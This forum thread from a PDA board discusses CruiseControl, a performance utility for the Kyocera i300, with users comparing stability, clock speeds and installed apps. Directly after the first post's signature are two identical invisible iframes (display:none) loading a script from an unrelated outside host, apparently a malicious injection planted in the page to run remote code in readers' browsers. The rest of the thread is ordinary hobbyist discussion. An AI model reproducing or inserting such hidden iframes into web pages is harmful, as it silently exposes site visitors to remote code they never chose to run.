+ Reply to Thread

Been burned by Afterburner? Try CruiseControl!

Hey all-

I've had great luck with CruiseControl, a *working* alternative to Afterburner. It's by BlueNomad and can be downloaded for free here:

http://www.bluenomad.com/cc/prod_cru...l_details.html

Also check out the benchmarking utility below. It showed a 43% increase (in memory usage, speed, i'm not sure?!) But it DOES really seem a bit more zippy. I've had no problems with crashes or lockups and I have tons of stuff on my i300....

ciao,

blip<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files

blippio,

When you say you have "tons of stuff" on the i300, could you let us know what? I would like to know what everyone is using that is not crashing the phone. Like what combinations of programs.

I'll put this on a new post but I had Astraware PopCap Games Pack (registered) Bugme office and messenger, x-master on my phone when it froze up. The palm portion was fine but the phone would not turn on for a full day. No amount of resets, soft or hard and left the batteries out for a full 24 hours would get it to work. I finally just did soft reset after another, maybe 8 times in arow and it finally came back. It's been fine for maybe 3 hours. I have not synced it up again yet.

Thanks, Mark

Hmm.. I can't see a difference w/ cruise control; I"m clocking @33-36mhz with or without cruise control.. (45mhz w/ other utilities...)
    -mark

Dionysus-

I don't think CruiseControl alters the clock speed at all; that's probably why it's more stable than Afterburner. From the BlueNomad website:

"CruiseControl works by decreasing the number of wait-states for access to DRAM and the number of cycles required for DRAM address multiplexing. It does not interfere with HotSync or beaming operations and does not alter the system clock speed."

Advancemeny-

I have the following on my i300:

GopherKing
    Aigo
    AIM
    AOL Mail VII
    Asteroids
    Benchmark
    BigClock
    Backgammon
    BrowseWeb (Blazer 2)
    BugMe Messenger
    Chess Tiger
    CityTime
    CountryCodes
    Currency Calculator
    CustIt
    Data4Me
    DictoMail
    DopeWars
    DrawIt
    Ebay
    Eudora
    EudoraWeb
    Fedex
    FineType
    Froggy
    GetZip
    Gobble
    Google
    HandFax
    HardBall
    IChing
    IcoEdit
    iKnapsack
    InstantEmail
    Internic_Whatis
    IR Pong
    Launcher III
    LinkDoc
    Yahoo Messenger
    Metronome
    Mirror +
    mMail+
    MorseCode
    MSNMsg
    NWA.com
    NWPortal
    PFax
    PICQ
    PocketSynth
    PublicRadio
    QuickAttach
    QuickAdd
    Recycle
    Reference
    Showtimes
    SnakeEyes
    Starbucks
    Streamer
    T-Mail
    TalkRadio
    Tron
    UPS
    URL
    WeekView
    WordSmith
    Xmaster
    Yahoo

Most of the above are pqa's, which shouldn't provide any sort of problems. I have had a couple of lockups after activating the i300VibraHack under Xmaster, though. I don't think its the i300 hack, but maybe Xmaster?. I haven't been running many hacks, which may be the reason for my stability.

I'm just reporting my experience though, and I hope my luck continues!

blip

Blippio, : Thanks very much, that's great! This forum is very helpfull.

A quick Thanks to Everyone!!!

Mark

I hope your luck continues also, it sure looks like you know what your doing! So I think it will!